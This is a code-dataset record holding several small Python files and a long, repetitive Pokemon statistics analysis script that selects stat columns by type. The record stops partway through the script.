| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0e95c4aa380124467e62cf995674ef5c876474b6
| 86
|
py
|
Python
|
Test.py
|
junugi/YOLO-OT
|
d3aba435fd15f9a29ab6af906c48a110507f3813
|
[
"MIT"
] | null | null | null |
Test.py
|
junugi/YOLO-OT
|
d3aba435fd15f9a29ab6af906c48a110507f3813
|
[
"MIT"
] | null | null | null |
Test.py
|
junugi/YOLO-OT
|
d3aba435fd15f9a29ab6af906c48a110507f3813
|
[
"MIT"
] | null | null | null |
from YOT_Base import YOT_Base
class Test(YOT_Base):
def test(self):
pass
| 14.333333
| 29
| 0.674419
| 14
| 86
| 3.928571
| 0.642857
| 0.381818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255814
| 86
| 5
| 30
| 17.2
| 0.859375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
7ec7c2ae9299b9fd8e5d3e7342e69cca0322b06c
| 70
|
py
|
Python
|
cells_in_gel/__init__.py
|
jingexu/cells-in-gel
|
68e5b2d536f5c2bc66410e1d0a81bc46916652b5
|
[
"MIT"
] | null | null | null |
cells_in_gel/__init__.py
|
jingexu/cells-in-gel
|
68e5b2d536f5c2bc66410e1d0a81bc46916652b5
|
[
"MIT"
] | 6
|
2020-04-15T03:17:42.000Z
|
2020-06-01T21:06:47.000Z
|
cells_in_gel/__init__.py
|
jingexu/cells-in-gel
|
68e5b2d536f5c2bc66410e1d0a81bc46916652b5
|
[
"MIT"
] | 1
|
2022-02-09T18:19:54.000Z
|
2022-02-09T18:19:54.000Z
|
from . import preprocess
from . import properties
from . import batch
| 17.5
| 24
| 0.785714
| 9
| 70
| 6.111111
| 0.555556
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171429
| 70
| 3
| 25
| 23.333333
| 0.948276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7eef7daa6b3107d1744840c0708838d4e7f363eb
| 31
|
py
|
Python
|
phonygres/engine/__init__.py
|
shz/phonygres
|
966c8eb1d0be9f53e1c13f65935dd3e1aa50d886
|
[
"Unlicense"
] | 2
|
2018-03-15T20:39:58.000Z
|
2021-11-17T17:57:19.000Z
|
phonygres/engine/__init__.py
|
shz/phonygres
|
966c8eb1d0be9f53e1c13f65935dd3e1aa50d886
|
[
"Unlicense"
] | null | null | null |
phonygres/engine/__init__.py
|
shz/phonygres
|
966c8eb1d0be9f53e1c13f65935dd3e1aa50d886
|
[
"Unlicense"
] | null | null | null |
from .executor import execute
| 15.5
| 30
| 0.806452
| 4
| 31
| 6.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 31
| 1
| 31
| 31
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7d07013650b48fbddda7c56255264117774ff41c
| 247,444
|
py
|
Python
|
analysis/analysis.py
|
aguerrero232/DataScienceGroupProject
|
f27bc29f5a3646d1e19474be821af08a347aecfe
|
[
"MIT"
] | null | null | null |
analysis/analysis.py
|
aguerrero232/DataScienceGroupProject
|
f27bc29f5a3646d1e19474be821af08a347aecfe
|
[
"MIT"
] | null | null | null |
analysis/analysis.py
|
aguerrero232/DataScienceGroupProject
|
f27bc29f5a3646d1e19474be821af08a347aecfe
|
[
"MIT"
] | null | null | null |
import loaddata
import pokemon_regression
import pokemon_stat_analysis
import pokemon_test_are_dragons_taller
import pokemon_normal_dist_and_actual_vals
separator_char = ", "
separator = '---------------------------------------------------------------'
tab: str = "\t"
def do_normal_dist_against_actual_values(options):
data_set, type_set, stat_set = options[0], options[1], options[2]
if data_set == "1": # all pokemon
set_name = "Pokemon"
modifier = ''
# grass pokemon
if type_set == "1":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.grass_types['total_points']
stat_stats = loaddata.grass_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['hp']
stat_stats = loaddata.grass_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['speed']
stat_stats = loaddata.grass_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['attack']
stat_stats = loaddata.grass_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['defense']
stat_stats = loaddata.grass_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['sp_attack']
stat_stats = loaddata.grass_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['sp_defense']
stat_stats = loaddata.grass_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.grass_types['height_m']
stat_stats = loaddata.grass_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.grass_types['weight_kg']
stat_stats = loaddata.grass_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fire pokemon
elif type_set == "2":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.fire_types['total_points']
stat_stats = loaddata.fire_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['hp']
stat_stats = loaddata.fire_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['speed']
stat_stats = loaddata.fire_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['attack']
stat_stats = loaddata.fire_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['defense']
stat_stats = loaddata.fire_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['sp_attack']
stat_stats = loaddata.fire_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['sp_defense']
stat_stats = loaddata.fire_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.fire_types['height_m']
stat_stats = loaddata.fire_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.fire_types['weight_kg']
stat_stats = loaddata.fire_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# water pokemon
elif type_set == "3":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.water_types['total_points']
stat_stats = loaddata.water_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.water_types['hp']
stat_stats = loaddata.water_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.water_types['speed']
stat_stats = loaddata.water_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.water_types['attack']
stat_stats = loaddata.water_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.water_types['defense']
stat_stats = loaddata.water_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.water_types['sp_attack']
stat_stats = loaddata.water_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.water_types['sp_defense']
stat_stats = loaddata.water_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.water_types['height_m']
stat_stats = loaddata.water_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.water_types['weight_kg']
stat_stats = loaddata.water_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# electric pokemon
elif type_set == "4":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.electric_types['total_points']
stat_stats = loaddata.electric_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['hp']
stat_stats = loaddata.electric_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['speed']
stat_stats = loaddata.electric_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['attack']
stat_stats = loaddata.electric_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['defense']
stat_stats = loaddata.electric_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['sp_attack']
stat_stats = loaddata.electric_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['sp_defense']
stat_stats = loaddata.electric_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.electric_types['height_m']
stat_stats = loaddata.electric_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.electric_types['weight_kg']
stat_stats = loaddata.electric_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# psychic pokemon
elif type_set == "5":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.psychic_types['total_points']
stat_stats = loaddata.psychic_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['hp']
stat_stats = loaddata.psychic_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['speed']
stat_stats = loaddata.psychic_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['attack']
stat_stats = loaddata.psychic_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['defense']
stat_stats = loaddata.psychic_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['sp_attack']
stat_stats = loaddata.psychic_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['sp_defense']
stat_stats = loaddata.psychic_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.psychic_types['height_m']
stat_stats = loaddata.psychic_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.psychic_types['weight_kg']
stat_stats = loaddata.psychic_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ice pokemon
elif type_set == "6":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.ice_types['total_points']
stat_stats = loaddata.ice_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['hp']
stat_stats = loaddata.ice_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['speed']
stat_stats = loaddata.ice_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['attack']
stat_stats = loaddata.ice_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['defense']
stat_stats = loaddata.ice_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['sp_attack']
stat_stats = loaddata.ice_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['sp_defense']
stat_stats = loaddata.ice_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.ice_types['height_m']
stat_stats = loaddata.ice_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.ice_types['weight_kg']
stat_stats = loaddata.ice_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dragon pokemon
elif type_set == "7":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.dragon_types['total_points']
stat_stats = loaddata.dragon_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['hp']
stat_stats = loaddata.dragon_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['speed']
stat_stats = loaddata.dragon_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['attack']
stat_stats = loaddata.dragon_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['defense']
stat_stats = loaddata.dragon_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['sp_attack']
stat_stats = loaddata.dragon_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['sp_defense']
stat_stats = loaddata.dragon_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.dragon_types['height_m']
stat_stats = loaddata.dragon_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.dragon_types['weight_kg']
stat_stats = loaddata.dragon_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dark pokemon
elif type_set == "8":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.dark_types['total_points']
stat_stats = loaddata.dark_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['hp']
stat_stats = loaddata.dark_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['speed']
stat_stats = loaddata.dark_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['attack']
stat_stats = loaddata.dark_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['defense']
stat_stats = loaddata.dark_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['sp_attack']
stat_stats = loaddata.dark_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['sp_defense']
stat_stats = loaddata.dark_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.dark_types['height_m']
stat_stats = loaddata.dark_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.dark_types['weight_kg']
stat_stats = loaddata.dark_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fairy pokemon
elif type_set == "9":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.fairy_types['total_points']
stat_stats = loaddata.fairy_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['hp']
stat_stats = loaddata.fairy_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['speed']
stat_stats = loaddata.fairy_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['attack']
stat_stats = loaddata.fairy_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['defense']
stat_stats = loaddata.fairy_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['sp_attack']
stat_stats = loaddata.fairy_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['sp_defense']
stat_stats = loaddata.fairy_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.fairy_types['height_m']
stat_stats = loaddata.fairy_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.fairy_types['weight_kg']
stat_stats = loaddata.fairy_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# normal pokemon
elif type_set == "10":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.normal_types['total_points']
stat_stats = loaddata.normal_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['hp']
stat_stats = loaddata.normal_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['speed']
stat_stats = loaddata.normal_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['attack']
stat_stats = loaddata.normal_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['defense']
stat_stats = loaddata.normal_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['sp_attack']
stat_stats = loaddata.normal_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['sp_defense']
stat_stats = loaddata.normal_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.normal_types['height_m']
stat_stats = loaddata.normal_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.normal_types['weight_kg']
stat_stats = loaddata.normal_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fighting pokemon
elif type_set == "11":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.fighting_types['total_points']
stat_stats = loaddata.fighting_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['hp']
stat_stats = loaddata.fighting_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['speed']
stat_stats = loaddata.fighting_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['attack']
stat_stats = loaddata.fighting_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['defense']
stat_stats = loaddata.fighting_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['sp_attack']
stat_stats = loaddata.fighting_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['sp_defense']
stat_stats = loaddata.fighting_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.fighting_types['height_m']
stat_stats = loaddata.fighting_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.fighting_types['weight_kg']
stat_stats = loaddata.fighting_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# flying pokemon
elif type_set == "12":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.flying_types['total_points']
stat_stats = loaddata.flying_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['hp']
stat_stats = loaddata.flying_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['speed']
stat_stats = loaddata.flying_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['attack']
stat_stats = loaddata.flying_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['defense']
stat_stats = loaddata.flying_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['sp_attack']
stat_stats = loaddata.flying_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['sp_defense']
stat_stats = loaddata.flying_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.flying_types['height_m']
stat_stats = loaddata.flying_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.flying_types['weight_kg']
stat_stats = loaddata.flying_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# poison pokemon
elif type_set == "13":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.poison_types['total_points']
stat_stats = loaddata.poison_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['hp']
stat_stats = loaddata.poison_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['speed']
stat_stats = loaddata.poison_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['attack']
stat_stats = loaddata.poison_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['defense']
stat_stats = loaddata.poison_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['sp_attack']
stat_stats = loaddata.poison_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['sp_defense']
stat_stats = loaddata.poison_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.poison_types['height_m']
stat_stats = loaddata.poison_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.poison_types['weight_kg']
stat_stats = loaddata.poison_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ground pokemon
elif type_set == "14":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.ground_types['total_points']
stat_stats = loaddata.ground_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['hp']
stat_stats = loaddata.ground_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['speed']
stat_stats = loaddata.ground_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['attack']
stat_stats = loaddata.ground_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['defense']
stat_stats = loaddata.ground_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['sp_attack']
stat_stats = loaddata.ground_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['sp_defense']
stat_stats = loaddata.ground_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.ground_types['height_m']
stat_stats = loaddata.ground_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.ground_types['weight_kg']
stat_stats = loaddata.ground_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# rock pokemon
elif type_set == "15":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.rock_types['total_points']
stat_stats = loaddata.rock_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.rock_types['hp']
stat_stats = loaddata.rock_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.rock_types['speed']
stat_stats = loaddata.rock_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
